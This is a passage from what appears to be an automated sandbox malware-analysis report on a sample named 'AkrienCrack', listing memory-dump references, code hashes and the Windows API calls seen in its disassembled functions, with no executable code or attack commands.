              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: DeleteFile
              • String ID:
              • API String ID: 4033686569-0
              • Opcode ID: f5d9e23327fa2c4235c5a3af0d155f55dbc4faa62b3d22f39a83a2b32734258d
              • Instruction ID: 63507ee8f9ef3ae630e732bfdd9503b3bdaacd4b022ae27086c8dd6a1ec6a158
              • Opcode Fuzzy Hash: f5d9e23327fa2c4235c5a3af0d155f55dbc4faa62b3d22f39a83a2b32734258d
              • Instruction Fuzzy Hash: ADE06D796802086ADB129E609C41FE977DCAB09782F4840A5B988D3060DB61DFD8BA90
              APIs
              • GdiplusShutdown.GDIPLUS(?,?,?,?,00B71FA1,000000FF), ref: 00B5A3D1
              • OleUninitialize.OLE32(?,?,?,?,00B71FA1,000000FF), ref: 00B5A3D6
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: GdiplusShutdownUninitialize
              • String ID:
              • API String ID: 3856339756-0
              • Opcode ID: a204e736425d9d27c78303e612464cfebbc2860c1186d373887430b610de8592
              • Instruction ID: 8e226ae30c5610a224d15d7969a8a2dd469946b89557254a382a2f7d9f9f976e
              • Opcode Fuzzy Hash: a204e736425d9d27c78303e612464cfebbc2860c1186d373887430b610de8592
              • Instruction Fuzzy Hash: B9F03032518654DFC7109B4CDC05B15FBE8FB49B20F0443AAF41993B61CF756800CB91
              APIs
              • GetFileAttributesW.KERNELBASE(?,?,?,00B4A189,?,00B476B2,?,?,?,?), ref: 00B4A1A5
              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00B4A189,?,00B476B2,?,?,?,?), ref: 00B4A1D1
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              APIs
              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B500A0
              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B4EB86,Crypt32.dll,00000000,00B4EC0A,?,?,00B4EBEC,?,?,?), ref: 00B500C2
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Similarity
              • API ID: DirectoryLibraryLoadSystem
              • String ID:
              • API String ID: 1175261203-0
              APIs
              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B59B30
              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00B59B37
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Similarity
              • API ID: BitmapCreateFromGdipStream
              • String ID:
              • API String ID: 1918208029-0
              APIs
                • Part of subcall function 00B6329A: try_get_function.LIBVCRUNTIME ref: 00B632AF
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B6217A
              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00B62185
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Similarity
              • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
              • String ID:
              • API String ID: 806969131-0
              APIs
              • DloadLock.DELAYIMP ref: 00B5DC73
              • DloadProtectSection.DELAYIMP ref: 00B5DC8F
                • Part of subcall function 00B5DE67: DloadObtainSection.DELAYIMP ref: 00B5DE77
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Similarity
              • API ID: Dload$Section$LockObtainProtect
              • String ID:
              • API String ID: 731663317-0
              APIs
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Similarity
              • API ID: ItemShowWindow
              • String ID:
              • API String ID: 3351165006-0
              APIs
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              APIs
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              APIs
              • __EH_prolog.LIBCMT ref: 00B48384
                • Part of subcall function 00B41380: __EH_prolog.LIBCMT ref: 00B41385
                • Part of subcall function 00B41380: new.LIBCMT ref: 00B413FE
                • Part of subcall function 00B419A6: __EH_prolog.LIBCMT ref: 00B419AB
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              APIs
              • __EH_prolog.LIBCMT ref: 00B41E05
                • Part of subcall function 00B43B3D: __EH_prolog.LIBCMT ref: 00B43B42
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              APIs
              • __EH_prolog.LIBCMT ref: 00B5A7C8
                • Part of subcall function 00B41380: __EH_prolog.LIBCMT ref: 00B41385
                • Part of subcall function 00B41380: new.LIBCMT ref: 00B413FE
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              APIs
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              APIs
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              APIs
              • __EH_prolog.LIBCMT ref: 00B45BDC
                • Part of subcall function 00B4B07D: __EH_prolog.LIBCMT ref: 00B4B082
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              APIs
              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00B6C13D,00000000,?,00B667E2,?,00000008,?,00B689AD,?,?,?), ref: 00B6854A
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              APIs
              • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00B4968F,?,?,?,?,00B71FA1,000000FF), ref: 00B496EB
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Similarity
              • API ID: ChangeCloseFindNotification
              • String ID:
              • API String ID: 2591292051-0
              APIs
              • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00B4A4F5
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Similarity
              • API ID: CloseFind
              • String ID:
              • API String ID: 1863332320-0
              APIs
              • SetThreadExecutionState.KERNEL32(00000001), ref: 00B506B1
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Similarity
              • API ID: ExecutionStateThread
              • String ID:
              • API String ID: 2211380416-0
              APIs
              • GdipAlloc.GDIPLUS(00000010), ref: 00B59D81
                • Part of subcall function 00B59B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B59B30
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Similarity
              • API ID: Gdip$AllocBitmapCreateFromStream
              • String ID:
              • API String ID: 1915507550-0
              APIs
              • GetFileType.KERNELBASE(000000FF,00B49887), ref: 00B49995
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: FileType
              • String ID:
              • API String ID: 3081899298-0
              APIs
              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00B5D43F
                • Part of subcall function 00B5AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B5AC85
                • Part of subcall function 00B5AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B5AC96
                • Part of subcall function 00B5AC74: IsDialogMessageW.USER32(000501F6,?), ref: 00B5ACAA
                • Part of subcall function 00B5AC74: TranslateMessage.USER32(?), ref: 00B5ACB8
                • Part of subcall function 00B5AC74: DispatchMessageW.USER32(?), ref: 00B5ACC2
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: Message$DialogDispatchItemPeekSendTranslate
              • String ID:
              • API String ID: 897784432-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
